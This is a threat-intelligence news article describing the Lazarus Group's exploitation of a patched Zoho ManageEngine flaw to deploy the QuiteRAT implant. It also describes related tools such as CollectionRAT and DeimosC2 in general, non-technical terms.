The North Korea-linked threat actor known as Lazarus Group has recently been observed exploiting a critical security vulnerability in Zoho ManageEngine ServiceDesk Plus, a flaw that has since been patched. This exploitation is part of their strategy to distribute a remote access trojan (RAT) called QuiteRAT.
The targets of these attacks have included internet backbone infrastructure and healthcare entities across Europe and the United States. This information comes from an analysis of a cybersecurity company, in a two-part report.
What is particularly noteworthy is that the Lazarus Group has persistently employed the same tactics and techniques over the years, despite these methods being well-documented and widely known within the cybersecurity community. This level of consistency highlights the group’s confidence in their operational approach.
The malware QuiteRAT is positioned as a successor to MagicRAT, which itself follows in the footsteps of TigerRAT. Additionally, during investigations into the adversary’s attack infrastructure reuse, a new threat named CollectionRAT was uncovered.
While QuiteRAT shares many capabilities with MagicRAT, it stands out due to its considerably smaller file size. Both of these implants are constructed using the Qt framework and exhibit features like arbitrary command execution.
The decision to use the Qt framework seems strategic, as it introduces complexity into the malware’s code, making analysis more challenging for security researchers.
In early 2023, the Lazarus Group exploited CVE-2022-47966, merely five days after a proof-of-concept for the vulnerability was made available online. This exploit was used to directly deploy the QuiteRAT binary from a malicious URL.
The researchers have observed that QuiteRAT is a clear evolutionary step from MagicRAT. While MagicRAT is more considerable, averaging around 18 MB, QuiteRAT is significantly smaller, at approximately 4 to 5 MB. Furthermore, QuiteRAT lacks a built-in persistence mechanism, requiring a command from the server to ensure its continued operation on a compromised host.
The Lazarus Group increasingly relies on open-source tools and frameworks, particularly in the initial access phase of their attacks, rather than exclusively in the post-compromise phase. The GoLang-based open-source DeimosC2 framework has been used to achieve persistent access, while CollectionRAT is mainly employed for metadata gathering, running arbitrary commands, managing files, and delivering additional payloads.
While the propagation method of CollectionRAT remains unclear, evidence suggests that a trojanized version of the PuTTY Link (Plink) utility is used to establish a remote tunnel to the system and serve the malware.
Previously, Lazarus Group relied on custom-built implants like MagicRAT, VSingle, Dtrack, and YamaBot to establish initial access to compromised systems. These implants would then deploy various open-source or dual-use tools to execute malicious activities within the compromised network.
The discovery of CollectionRAT indicates that the Lazarus Group is continually adapting its tactics and expanding its toolkit. This includes weaponizing newly disclosed vulnerabilities in software to achieve their objectives more effectively.